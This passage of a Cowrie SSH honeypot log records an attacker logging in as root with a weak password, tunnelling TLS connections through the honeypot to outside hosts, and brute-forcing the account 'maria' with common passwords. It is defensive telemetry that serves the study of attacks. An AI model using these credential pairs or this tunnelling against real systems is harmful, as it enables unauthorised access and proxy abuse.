ert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-26T18:32:43.436678Z","src_ip":"212.227.235.229","session":"e2f622996eec"}
{"eventid":"cowrie.login.success","username":"root","password":"Q1w2e3r4","message":"login attempt [root/Q1w2e3r4] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:32:43.976632Z","src_ip":"212.227.235.229","session":"e2f622996eec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"54.216.40.100","dst_port":443,"src_ip":"212.227.235.229","src_port":34260,"message":"direct-tcp connection request to 54.216.40.100:443 from 127.0.0.1:34260","sensor":"my-vps","timestamp":"2025-08-26T18:32:46.679172Z","session":"e2f622996eec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"54.216.40.100","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03_\\x92\\xaa\\xb7\\xd9O\\xa7\\xe68\\xe4R\\xa0T\\x92tU\\x82('\\xba\\x98q\\x85\\xe9\\xd3?\\xbe\\xb2\\xb6m\\xfc\\xe0 \\xd6\\xad=\\x85:\\xe3%\\x15%\\xa4\\xc0$Z\\xb2\\x19\\xc2(#\\\\\\xd3x\\xc8j\\x94\\x91;kH(\\x107\\x10\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 @\\x93Pv\\xc7\\x1e0\\xd2\\x0f\\xd3\\xbb\\xb4\\xe5I\\xa5\\xe9\\xec\\xf4y\\xa9\\xce\\x01Mk\\x96\\x14\\xec\\xbe\\xf3\\x8f@\\x01\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 54.216.40.100:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03_\\x92\\xaa\\xb7\\xd9O\\xa7\\xe68\\xe4R\\xa0T\\x92tU\\x82('\\xba\\x98q\\x85\\xe9\\xd3?\\xbe\\xb2\\xb6m\\xfc\\xe0 \\xd6\\xad=\\x85:\\xe3%\\x15%\\xa4\\xc0$Z\\xb2\\x19\\xc2(#\\\\\\xd3x\\xc8j\\x94\\x91;kH(\\x107\\x10\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 @\\x93Pv\\xc7\\x1e0\\xd2\\x0f\\xd3\\xbb\\xb4\\xe5I\\xa5\\xe9\\xec\\xf4y\\xa9\\xce\\x01Mk\\x96\\x14\\xec\\xbe\\xf3\\x8f@\\x01\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T18:32:47.688721Z","src_ip":"212.227.235.229","session":"e2f622996eec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"23.62.220.197","dst_port":443,"src_ip":"212.227.235.229","src_port":35188,"message":"direct-tcp connection request to 23.62.220.197:443 from 127.0.0.1:35188","sensor":"my-vps","timestamp":"2025-08-26T18:32:48.503660Z","session":"e2f622996eec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"23.62.220.197","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x16C\\x10rV=_\\x1b\\xf4\\xaa\\x8d\\x98\\x93\\xb2\\xfb\\x00x\\xe0\\t\\xd2A`\\xb3\\xee\\xe29\\xe5\\xfdCC\\xa9f \\x9e?\\x9e\\x05\\x1b\\x84\\x87\\x87\\x1aH\\xf0\\r\\xd1\\xcb\\xf6'\\xfe\\x1b\\x16\\xf8\\xf2\\xfd\\xeb\\x0b\\x06\\xe5\\xbbm\\xfa\\xb2\\xd9#\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x94\\x0c\\x1e\\xf2\\xbc\\xb3W\\xb0s\\xdc\\xb8Q\\x91\\xa7\\xab+E\\x91\\xb4\\\\\\x90\\x14\\xd2\\xcf\\x84\\x96\\xc5`\\x86h\\x89\\x1d\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":1,"message":"discarded direct-tcp forward request 1 to 23.62.220.197:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x16C\\x10rV=_\\x1b\\xf4\\xaa\\x8d\\x98\\x93\\xb2\\xfb\\x00x\\xe0\\t\\xd2A`\\xb3\\xee\\xe29\\xe5\\xfdCC\\xa9f \\x9e?\\x9e\\x05\\x1b\\x84\\x87\\x87\\x1aH\\xf0\\r\\xd1\\xcb\\xf6'\\xfe\\x1b\\x16\\xf8\\xf2\\xfd\\xeb\\x0b\\x06\\xe5\\xbbm\\xfa\\xb2\\xd9#\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x94\\x0c\\x1e\\xf2\\xbc\\xb3W\\xb0s\\xdc\\xb8Q\\x91\\xa7\\xab+E\\x91\\xb4\\\\\\x90\\x14\\xd2\\xcf\\x84\\x96\\xc5`\\x86h\\x89\\x1d\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T18:32:48.639552Z","src_ip":"212.227.235.229","session":"e2f622996eec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.251.208.164","dst_port":443,"src_ip":"212.227.235.229","src_port":35448,"message":"direct-tcp connection request to 142.251.208.164:443 from 127.0.0.1:35448","sensor":"my-vps","timestamp":"2025-08-26T18:32:48.751568Z","session":"e2f622996eec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.251.208.164","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03)\\x06\\xed\\x1d\\xe8\\xd7~Q-q\\xe9\\xf9xr\\xdc\\xa0\\x819\\x05]\\x80\\xc1\\xf7cJ\\xd4\\xea\\xfe\\\\x\\xf4\\xb6 ~\\xbd\\xdbhQ!~K\\xd8\\xa5!\\xec\\x96\\xa6!_\\xbf\\x86\\x04\\x98\\xa65\\x8e\\xbb\\xf4\\x0c\\x88\\x88:\\xf0R\\xc7\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xf0\\xbe \\xa1Y\\x99\\x9a\\\\\\x9a'K\\xe49\\xfcC\\xdf\\x95T\\x82\\x068sT\\x11 \\t0)\\xabv)i\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":2,"message":"discarded direct-tcp forward request 2 to 142.251.208.164:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03)\\x06\\xed\\x1d\\xe8\\xd7~Q-q\\xe9\\xf9xr\\xdc\\xa0\\x819\\x05]\\x80\\xc1\\xf7cJ\\xd4\\xea\\xfe\\\\x\\xf4\\xb6 ~\\xbd\\xdbhQ!~K\\xd8\\xa5!\\xec\\x96\\xa6!_\\xbf\\x86\\x04\\x98\\xa65\\x8e\\xbb\\xf4\\x0c\\x88\\x88:\\xf0R\\xc7\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xf0\\xbe \\xa1Y\\x99\\x9a\\\\\\x9a'K\\xe49\\xfcC\\xdf\\x95T\\x82\\x068sT\\x11 \\t0)\\xabv)i\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T18:32:48.874945Z","src_ip":"212.227.235.229","session":"e2f622996eec"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:32:48.983863Z","src_ip":"212.227.235.229","session":"e2f622996eec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":20756,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8d16f1855e3","protocol":"ssh","message":"New connection: 212.227.235.229:20756 (1.2.3.4:22) [session: a8d16f1855e3]","sensor":"my-vps","timestamp":"2025-08-26T18:33:05.993800Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T18:33:05.995725Z","src_ip":"212.227.235.229","session":"a8d16f1855e3"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T18:33:06.120349Z","src_ip":"212.227.235.229","session":"a8d16f1855e3"}
{"eventid":"cowrie.login.failed","username":"maria","password":"password","message":"login attempt [maria/password] failed","sensor":"my-vps","timestamp":"2025-08-26T18:33:06.703262Z","src_ip":"212.227.235.229","session":"a8d16f1855e3"}
{"eventid":"cowrie.login.failed","username":"maria","password":"maria","message":"login attempt [maria/maria] failed","sensor":"my-vps","timestamp":"2025-08-26T18:33:07.833954Z","src_ip":"212.227.235.229","session":"a8d16f1855e3"}
{"eventid":"cowrie.login.failed","username":"maria","password":"abc123","message":"login attempt [maria/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T18:33:08.961037Z","src_ip":"212.227.235.229","session":"a8d16f1855e3"}
{"eventid":"cowrie.login.failed","username":"maria","password":"abcd123","message":"login attempt [maria/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-26T18:33:10.088221Z","src_ip":"212.227.235.229","session":"a8d16f1855e3"}
{"eventid":"cowrie.login.failed","username":"maria","password":"abcd1234","message":"login attempt [maria/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-26T18:33:11.214808Z","src_ip":"212.227.235.229","session":"a8d16f1855e3"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:33:12.342622Z","src_ip":"212.227.235.229","session":"a8d16f1855e3"}
